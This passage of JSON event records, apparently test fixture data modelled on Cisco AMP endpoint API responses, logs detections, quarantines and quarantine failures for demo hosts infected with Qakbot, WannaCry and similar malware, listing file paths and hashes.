Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":542000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":860000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 